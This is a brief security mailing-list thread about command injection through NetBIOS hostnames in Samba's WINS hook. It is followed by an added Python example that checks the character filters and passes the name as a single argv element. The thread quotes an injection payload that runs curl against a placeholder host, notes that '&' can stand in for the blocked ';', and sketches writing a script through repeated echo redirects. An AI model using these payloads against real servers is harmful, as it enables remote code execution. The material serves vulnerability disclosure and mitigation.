On 16/10/25 12:30, Caveney, Seamus G wrote:
> Illegal characters in a NetBIOS hostname are:
> \ / : * ? " < > | ,
> notably excluding backticks and semicolons. I'm not deeply familiar
> with the Samba code base but a glance at nbtname.c and winsserver.c
> seems to suggest that those character limitations aren't enforced at
> the protocol level, so it might be possible to use pipes, redirects
> or exec a local binary with a short path. Otherwise, the easiest
> exploitable payload I can think of would be:
> ;`curl ab.cd`;
The characters '<', ';', and '>' are blocked by the needs of the ldb
database that this server uses (I am not sure I checked '`', but it is
probably allowed). But of course '&' works just as well as ';'.
If '>' worked, I think you could build up a script with a lot of
"&echo foo>>x&" followed by a `tr`.
> I'd be interested to see if anybody has a living Samba install
> configured as a DC with WINS still running in 2025.
Me too!
The last indication of a 'wins hook' line I have seen was in 2016, and
that was commented out.
An example of a place that may use it is a factory where some machinery
is a few decades old and only knows WINS but otherwise still works well.
cheers,
Douglas
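An added example, not from the thread or from Samba, that separates the three checks this exchange turns on: the NetBIOS illegal-character rule from the quoted list, the ldb rejection of '<', ';' and '>', and the mitigation of passing a hostname to a hook helper as one argv element instead of interpolating it into a shell command line. The hook path is a constructed placeholder; the sample name is the payload quoted above.

```python
import shlex
import subprocess

# Illegal NetBIOS hostname characters, as listed in the thread.
NETBIOS_ILLEGAL = set('\\/:*?"<>|,')
# Characters the thread says the ldb layer rejects ('&' is not among them).
LDB_REJECTED = set('<;>')
# Shell metacharacters: neither list above covers them all.
SHELL_META = set('`$&|;<>()\n \'"\\')


def is_valid_netbios_name(name):
    """Only the NetBIOS rule: the illegal-character list and the 15-byte limit."""
    return 0 < len(name) <= 15 and not (set(name) & NETBIOS_ILLEGAL)


def passes_ldb_filter(name):
    """The ldb rejection described in the thread; a name with '&' still passes."""
    return not (set(name) & LDB_REJECTED)


def shell_metachars(name):
    """Shell metacharacters the name would carry into an interpolated command."""
    return set(name) & SHELL_META


def unsafe_command_string(hook, operation, name):
    """The failure mode: the name interpolated into one shell command line.
    Shown only to make the shell's view visible; never execute this form."""
    return f"{hook} {operation} {name}"


def build_hook_argv(hook, operation, name):
    """The fix: one argv element per field, handed to exec without a shell,
    so metacharacters in the name stay literal bytes of a single argument."""
    return [hook, operation, name]


def run_hook(hook, operation, name):
    """Run the helper with a list argv, so no shell ever parses the name."""
    return subprocess.run(build_hook_argv(hook, operation, name), check=False).returncode


if __name__ == "__main__":
    HOOK = "/path/to/wins-hook"             # constructed placeholder path
    sample = ";`curl ab.cd`;"               # the payload quoted in the thread
    print(is_valid_netbios_name(sample))    # passes the NetBIOS rule
    print(shell_metachars(sample))          # what a shell would interpret
    print(unsafe_command_string(HOOK, "add", sample))
    print(shlex.join(build_hook_argv(HOOK, "add", sample)))  # quoted for logging
```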